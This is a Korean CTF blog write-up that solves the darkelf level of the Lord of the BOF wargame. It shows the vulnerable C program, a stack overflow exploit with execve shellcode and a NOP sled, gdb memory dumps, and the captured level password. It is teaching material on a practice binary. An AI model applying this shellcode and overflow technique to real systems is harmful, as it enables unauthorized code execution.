[LOB] wolfman -> darkelf

2019. 7. 28. 23:57Wargame & CTF/LOB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf 
        - egghunter + buffer hunter + check length of argv[1]
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    // egghunter 
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    if(argv[1][47!= '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 040);
}
cs


buffer의 길이를 확인한다. 48자 이상이면 안된다.

[buffer(40)][SFP(4)][RET(4)]

buffer를 0으로 초기화 하기 때문에, 이번에도 argv[2]에다가 쉘코드를 넣어주면 된다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[wolfman@localhost tmp]$ ./darkelf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ gdb -q darkelf core 
Core was generated by `./darkelf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff6c0:    0x00000000    0xbffff704    0xbffff714    0x40013868
0xbffff6d0:    0x00000003    0x08048450    0x00000000    0x08048471
0xbffff6e0:    0x08048500    0x00000003    0xbffff704    0x08048390
0xbffff6f0:    0x0804864c    0x4000ae60    0xbffff6fc    0x40013e90
0xbffff700:    0x00000003    0xbffff813    0xbffff81d    0xbffff84e
0xbffff710:    0x00000000    0xbffffc50    0xbffffc66    0xbffffc7e
0xbffff720:    0xbffffc9d    0xbffffcbf    0xbffffcd1    0xbffffcde
0xbffff730:    0xbffffea1    0xbffffec0    0xbffffeda    0xbffffeef
0xbffff740:    0xbfffff04    0xbfffff0f    0xbfffff28    0xbfffff38
0xbffff750:    0xbfffff40    0xbfffff51    0xbfffff5f    0xbfffff6d
0xbffff760:    0xbfffff7e    0xbfffff8c    0xbfffff97    0xbfffffaa
0xbffff770:    0xbfffffe6    0x00000000    0x00000003    0x08048034
0xbffff780:    0x00000004    0x00000020    0x00000005    0x00000006
0xbffff790:    0x00000006    0x00001000    0x00000007    0x40000000
0xbffff7a0:    0x00000008    0x00000000    0x00000009    0x08048450
0xbffff7b0:    0x0000000b    0x000001f9    0x0000000c    0x000001f9
0xbffff7c0:    0x0000000d    0x000001f9    0x0000000e    0x000001f9
0xbffff7d0:    0x00000010    0x0f8bfbff    0x0000000f    0xbffff80e
0xbffff7e0:    0x00000000    0x00000000    0x00000000    0x00000000
0xbffff7f0:    0x00000000    0x00000000    0x00000000    0x00000000
(gdb) 
0xbffff800:    0x00000000    0x00000000    0x00000000    0x36690000
0xbffff810:    0x2e003638    0x7261642f    0x666c656b    0x41414100
0xbffff820:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff830:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff840:    0x41414141    0x41414141    0xbfbfbf41    0x909000bf
0xbffff850:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff860:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff870:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff880:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff890:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8a0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8b0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8c0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8d0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8e0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8f0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff900:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff910:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff920:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff930:    0x90909090    0x90909090    0x90909090    0x90909090
cs


이번에도 NOP SLED를 이용할 것이다.


1
2
3
4
5
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 506
kernel crashed
cs


darkelf : kernel crashed

저작자표시 (새창열림)

'Wargame & CTF > LOB' 카테고리의 다른 글

[LOB] orge -> troll  (0) 2019.07.29
[LOB] darkelf -> orge  (0) 2019.07.29
[LOB] orc -> wolfman  (0) 2019.07.28
[LOB] goblin -> orc  (0) 2019.07.28
[LOB] cobolt -> goblin  (0) 2019.07.28

관련글

댓글 0

티스토리툴바